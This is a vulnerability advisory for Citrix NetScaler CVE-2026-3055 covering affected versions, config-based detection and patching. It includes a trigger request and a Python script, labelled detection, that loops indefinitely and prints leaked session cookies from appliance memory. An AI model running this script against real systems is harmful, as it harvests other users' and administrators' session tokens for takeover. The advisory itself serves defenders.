Critical Citrix NetScaler CVE‑2026‑3055: Exploit Details, Detection Script, and Patch Guidance

Vulnerability overview

CVE‑2026‑3055 (CVSS 9.3) is a memory‑overread (CWE‑125) bug in Citrix NetScaler ADC/Gateway that manifests only when the appliance is configured as a SAML Identity Provider (SAML IDP). The flaw allows an unauthenticated remote attacker to read residual memory, potentially exposing session tokens, admin session IDs, and other sensitive data.

Affected versions

NetScaler ADC/Gateway 14.1 earlier than 14.1‑60.58 (fixed in 14.1‑66.59 and later)

NetScaler ADC/Gateway 13.1 earlier than 13.1‑62.23

NetScaler ADC FIPS / NDcPP earlier than 13.1‑37.262

Impact

When the vulnerable endpoint processes a crafted request, it reads uninitialized memory and returns the data Base64‑encoded in the NSC_TASS cookie. The leaked memory can contain previous HTTP request headers, internal cookies, and administrator session identifiers.

Detection

Search the NetScaler configuration for the string add authentication samlIdPProfile. Presence of this command strongly indicates the device is configured as a SAML IDP and therefore vulnerable.

Exploitation mechanics

The overread is triggered by the wctx query parameter. The appliance checks only for the parameter’s existence; it does not verify that a value or an ‘=’ sign follows, causing it to read dead memory.

Leaked data is delivered via the response header Set‑Cookie: NSC_TASS=…, where the value is a Base64‑encoded memory dump.

Minimal proof‑of‑concept request (for detection only): GET /wsfed/passive?wctx HTTP/1.1 When sent to /saml/login or /wsfed/passive, a vulnerable device responds with a 302 redirect and an NSC_TASS cookie containing Base64 memory. Repeating the request yields different memory blocks. Patched devices no longer include such data.

Detection script (Python)

import base64
import requests
import urllib3
urllib3.disable_warnings()
while True:
    try:
        resp = requests.get(
            "https://<your‑target‑IP-or‑domain>/wsfed/passive?wctx",
            verify=False,
            allow_redirects=False,
        )
        tass = resp.cookies.get('NSC_TASS', None)
        if tass is None:
            continue
        tassText = base64.b64decode(tass)
        memIdx = tassText.find(b'wctx=')
        if memIdx != -1:
            bled = tassText[memIdx+5:]
            cookiePos = bled.find(b'Cookie')
            if cookiePos != -1:
                print(bled[cookiePos:].decode('ascii', errors='ignore'))
    except Exception:
        pass

Usage steps

Replace <your‑target‑IP-or‑domain> with the NetScaler VIP you want to test.

Execute the script only on systems you are authorized to test.

If the decoded output contains strings such as "Cookie", "Header", or session identifiers, the appliance is leaking memory and is vulnerable.

Mitigation

Upgrade to the fixed builds listed above. Citrix cloud‑hosted instances receive the update automatically. The official Citrix security bulletin (article CTX696300) provides the patch download links and configuration‑check commands.